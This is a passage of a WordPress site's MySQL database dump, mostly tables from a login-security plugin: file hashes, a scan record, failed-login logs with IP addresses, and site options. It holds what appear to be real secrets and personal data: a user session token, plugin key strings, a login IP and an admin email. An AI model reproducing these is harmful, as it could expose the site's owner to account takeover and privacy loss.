s/elementor/includes/controls/wysiwyg.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb3818501a6b2ec73fb1ad422aee1bc8f64f925f','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb56573b87fe088c39207cb3e14eeeb3b5c027e1','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/shapes/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb59ce5ef0e2a4cab4199008b1bf1a08375f969a','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/class-wp-sitemaps-registry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb6d338df2b528654cd66cbeab3a3a94448bd1d7','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb72f9e610abfd9c70e2a28c95a3bb01cecc726b','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-theme-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb775e275f1175873ba82c87e49dfa0127f8d5b1','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/conditions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fbafcbf99d1445b1e2def0e8077915d271bb6a86','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fbf47377801aaba319ca2f90481b4bb42dd2faac','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/global-typography.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc0a60792bcb3f06efab2f81c8dd01e3aa9be92b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc0f15fad95205a67c4adae29eacecc8e1257e18','/home/westonspirit.org.uk/public_html/wp-admin/includes/export.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc1fd76b87748cb721ca6ac7c4c467cfdc0f48e0','/home/westonspirit.org.uk/public_html/wp-includes/ID3/getid3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc25394d7c7adc13503454c97478383322a32b67','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc2b0ee6cef0ede7a207d8ec65150dcb3681ca33','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/schemes/color-picker.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc501f1ae0df8bb3b8224c6cdc26725757014523','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/actions/nothing.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc698a19728886f4c1de2e62a3c8f35a0bf52e20','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/general/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc71375c3b57a5d1b38e56011b0c806cbbc59336','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/base/css-model.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc7230bdda4a000200eebf078e11e1d465eb497c','/home/westonspirit.org.uk/public_html/wp-includes/template-loader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc7a10ddbf1bcf870ab32bda019988dd878ce3ba','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/base/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fc9bbeae63ad37c77eb69fb872267f3c541073d9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fcaf766af539ab9aa8e62ddbd803339b7217ec4f','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-categories.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fcc38ba98a9370c431e969fa274dac6423adc836','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd12b93e47b596362d54033ba3ad8efbfde07b51','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd13bb555f231faed762745b8820e4a088daf353','/home/westonspirit.org.uk/public_html/wp-admin/edit-form-comment.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd1be7b9f8d789250b96efdc45549deadb4e711a','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-list-table-compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd27fa7d0b79da78bff5ca85b7f2a1664d7c71a0','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/embed-content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd4925fb0d1d1bf796a68dfd4851b4ac5ce6ecf1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd5542b6b02bef3d6314f8a9fba7a9d5093d345f','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-site-health-auto-updates.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd763f4004841a9b70304223bde6f1b0362f4565','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/country-block-map.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fd81fb8b8d984c41f2bbcae77028faa64448a97c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fe18923b1b926557a8f83d0dcaf6ee2ff55eb921','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/lib/constants.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fe1d3e4c230371f72ce78eb394e9d937a2939dbf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/wp-api.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fe1efdb20e99f39cfbcc02a97ead09e7196bacab','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-simplepie-sanitize-kses.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fe49627f722c754a94c780cebea74fbddd6c6ed5','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-ftp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fe975ee2cf785a039aa01bf370cb1f9fb2fd1140','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-encoding.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'feba3553921dd1ada7a8ffae3b894f7f6b43086a','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/Transport.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fec9224015b1f354261c95f22c488063913d0e18','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fedce3dac582b8386ba76cab01c0e37d6a82d405','/home/westonspirit.org.uk/public_html/wp-admin/edit-form-advanced.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fee70a68e41b0616060646d18531ca9ca1b857df','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ff6f3c2c09a3edb8fb95d7410422e6abc0a526b7','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-hook.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ff8e4c9a04b9baf41cc70ba4f9d12f02117c2484','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-image-editor-gd.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ff8fda2291c6a8ce6be9256c13d44cc998902fb9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-general.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ffdb1a77b11a5a2dffa7bce18b036d8c9b3a9fbc','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/responsive/responsive.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ffe54e9b5d4a346a27b16f30d318b0b0d5315ef6','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-importer.php',0,'','','',0,0,0,0,0,'','');
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_sets`
--

DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_sets`
--

LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('admin_message',0,'a:0:{}',0),('admin_notice',0,'a:0:{}',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_admin_wide',0,'',0),('cerber_user',1,'a:2:{s:10:\"last_login\";a:2:{s:2:\"ip\";s:13:\"103.70.171.66\";s:2:\"ua\";s:40:\"83e599b94f7817a451a1792c6fb4264c84f03f8f\";}s:11:\"2fa_history\";a:2:{i:0;i:3;i:1;i:1628241083;}}',0),('garbage_collector',0,'1629899106',0),('hash_pl_6c008a9454ea346b3aebab88a946419606554385',0,'a:4:{s:4:\"name\";s:7:\"Akismet\";s:3:\"ver\";s:5:\"2.5.6\";s:4:\"hash\";a:10:{s:9:\"admin.php\";s:64:\"32af0c870d53a271f20dc20896196043536627cb52ed87d980068bb2287e3eb3\";s:11:\"akismet.css\";s:64:\"41642ccf3fd5b706b95a02fa87c0e1ddece6a007c37ac0868c5514a03a322580\";s:10:\"akismet.js\";s:64:\"0ed2a5cc83c442071af1db368bc18e9eeed07b45033bbbb8ce7dba8151432510\";s:11:\"akismet.php\";s:64:\"90a64b2f18485235f9d1fd8c6886720a0686cd9225622bbc9a8b6d94d1812409\";s:12:\"contents.php\";s:64:\"62b2e86a1c68dac9a8882829d5ba744b4c0d18041409739773a0cdff92162afd\";s:9:\"index.php\";s:64:\"2453d05345c179c9ebb0def8fb45165917acc2112e7df4d3691f5ff2e17505ec\";s:7:\"sym.php\";s:64:\"478dfc65a38128c47816491332d46038037046d05e813f36c956a6dfbcc670c7\";s:11:\"updates.php\";s:64:\"e90c0cc92de40b7c24d0a8bda7745ee9e0e6d6694d0f33b582bd57f009ebce04\";s:12:\"wjsindex.php\";s:64:\"378cb1fdb8922cb8a19a73bf32d6fa5c33d239b4fedfcbdf0903bf9998e6686e\";s:5:\"x.php\";s:64:\"09f42c9a85b652594d30d309919c9b29b91152ea87775e1652053d50afc24a5c\";}s:4:\"time\";i:1629757355;}',0),('quarantined_total',0,'0',0),('q_cache_3606de1f0c571e69ba8ffc2ad10f2c1de449e930',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"38\"]]]}',1629904690),('q_cache_43b0c21ef556584aa27bbd81a33fdc513289b907',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"38\"]]]}',1629904920),('q_cache_4e7320879de2d6d03c82efb3825dd824855efa4a',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"12\"]]]}',1629904921),('q_cache_538db9451bc8358146192a453acc52ad800ac748',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"747\"]]]}',1629904920),('q_cache_6299b20eaa1dc47b8b17f77384d4ba9482d60da1',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"0\"]]]}',1629904920),('q_cache_7d22392ea7b4cf83e89ceac453ce04f2228dfb85',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[]]}',1629904690),('q_cache_a4f0ca76b24b0db7ce93d0c645ca275fcf66cd2e',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"0\"]]]}',1629904690),('q_cache_ba57a0a93679eff3236fccf0a4471e71fede1f89',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"0\"]]]}',1629904690),('q_cache_c3290f74e1f01e8fe09b8959b1b35da2d554b715',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"\",\"user_id\":\"0\",\"stamp\":\"1629897321.2664\",\"activity\":\"50\",\"session_id\":\"thb5u47EnZ3HRG9feaC6wrc2\",\"country\":\"\",\"details\":\"13|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"\",\"user_id\":\"0\",\"stamp\":\"1629897320.9496\",\"activity\":\"50\",\"session_id\":\"uVEpgorXHshY2LmtzFODU06Q\",\"country\":\"\",\"details\":\"13|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"\",\"user_id\":\"0\",\"stamp\":\"1629897320.3084\",\"activity\":\"50\",\"session_id\":\"y6x2kspl7jMvQJfYdmKWwerb\",\"country\":\"\",\"details\":\"13|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"\",\"user_id\":\"0\",\"stamp\":\"1629897319.4665\",\"activity\":\"50\",\"session_id\":\"yRzUZjtfJL0adPBHSrcl7Qqu\",\"country\":\"\",\"details\":\"13|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"\",\"user_id\":\"0\",\"stamp\":\"1629897305.9384\",\"activity\":\"50\",\"session_id\":\"ErLkojMxW9OdTQcRZK20ebSh\",\"country\":\"\",\"details\":\"13|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"\",\"user_id\":\"0\",\"stamp\":\"1629897303.7837\",\"activity\":\"10\",\"session_id\":\"LocixnDrPjT2d5U8qStsE9lu\",\"country\":\"\",\"details\":\"701|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"westonspirit\",\"user_id\":\"0\",\"stamp\":\"1629897254.6571\",\"activity\":\"51\",\"session_id\":\"UQHFNL90EWh2DToScAyqVl8K\",\"country\":\"\",\"details\":\"0|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"185.175.113.72\",\"ip_long\":\"3115282760\",\"user_login\":\"nothinghappenign\",\"user_id\":\"0\",\"stamp\":\"1629897181.2065\",\"activity\":\"51\",\"session_id\":\"LJmgvfbQYcTU6hX4w0WPAuk2\",\"country\":\"\",\"details\":\"0|0|0|0|www.westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"198.204.225.194\",\"ip_long\":\"3335315906\",\"user_login\":\"uk\",\"user_id\":\"0\",\"stamp\":\"1629897154.3937\",\"activity\":\"51\",\"session_id\":\"SbaTtz2wMPFgCeN8uB7yIKoi\",\"country\":\"\",\"details\":\"0|0|0|0|westonspirit.org.uk\\/wp-login.php\"},{\"ip\":\"69.30.225.100\",\"ip_long\":\"1159651684\",\"user_login\":\"org\",\"user_id\":\"0\",\"stamp\":\"1629896886.3454\",\"activity\":\"51\",\"session_id\":\"eUguqNfExVXb4YC3l1czHDdZ\",\"country\":\"\",\"details\":\"0|0|0|0|westonspirit.org.uk\\/wp-login.php\"}]]}',1629904690),('q_cache_d0c25f3f6b329e555ffdbc1b9fc4ea4f07d27861',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"12\"]]]}',1629904690),('q_cache_dd8dbe5dfdc12f5491ab9c8d151c131d22cefa6a',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"0\"]]]}',1629904920),('q_cache_f897948069d3bcf8d6d571cbca22626928003c8f',0,'{\"hash\":\"ea4adc59e98455c7ed7a822f0c3bb62325d4ba1b\",\"results\":[[[\"747\"]]]}',1629904690),('refresh_add_on_list',0,'0',0),('scan',1629897503,'a:17:{s:4:\"mode\";s:5:\"quick\";s:2:\"id\";i:1629897503;s:7:\"started\";i:1629897503;s:8:\"finished\";i:0;s:7:\"aborted\";i:0;s:7:\"scanned\";a:2:{s:5:\"files\";s:1:\"0\";s:5:\"bytes\";N;}s:6:\"issues\";a:0:{}s:11:\"step_issues\";a:0:{}s:5:\"total\";a:2:{s:5:\"files\";s:4:\"2069\";s:6:\"parsed\";s:3:\"501\";}s:9:\"integrity\";a:0:{}s:2:\"ip\";s:14:\"185.175.113.72\";s:5:\"cloud\";b:0;s:9:\"next_step\";i:5;s:7:\"numbers\";a:0:{}s:6:\"mode_h\";s:10:\"Quick Scan\";s:7:\"chunked\";b:0;s:10:\"compressed\";i:0;}',0),('tmp_last_file',0,'',0),('_background_tasks',0,'a:0:{}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"da957addd72c3410b7a8c25d6d22187a\";i:1;i:1629805983;i:4;s:40:\"SK//NQOFHS1X5MIY6RGU4E2D03CBWJPT8Z7V9KLA\";}',0),('_cerber_last',1,'1629897303',1629900903),('_cerber_mnemosyne',0,'a:3:{i:2;s:17:\"0KLQUYV25SZB73OW6\";i:4;i:8;i:8;s:18:\"3T5J8LMOBNX9IU4VSG\";}',0),('_check_env',0,'1629897720',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_uss`
--

DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_uss`
--

LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
INSERT INTO `wp_cerber_uss` VALUES (1,'103.70.171.66','',1629755631,1629928431,'CkG0wsM36mpTorqaL9HNjW2g','7992948a74574251908c9e7c3a813eb30347849871df08f21640f3e8faa82baf');
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=117160 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','http://www.westonspirit.org.uk','yes'),(2,'home','http://www.westonspirit.org.uk','yes'),(3,'blogname','Weston Spirit','yes'),(4,'blogdescription','New and reviews from across the UK','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','bensykes@bensykes.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/blogs/%postname%','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins1','a:7:{i:0;s:27:\"ad-inserter/ad-inserter.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:3;s:9:\"hello.php\";i:4;s:27:\"redirection/redirection.php\";i:5;s:67:\"share-subscribe-contact-aio-widget/free_profitquery_aio_widgets.php\";i:6;s:59:\"ultimate-social-media-icons/ultimate_social_media_icons.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:2:{i:0;s:75:\"/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/style.css\";i:1;s:0:\"\";}','no'),(40,'template','busicare','yes'),(41,'stylesheet','busicare-dark','yes'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:5:{i:1;a:0:{}i:3;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:329:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     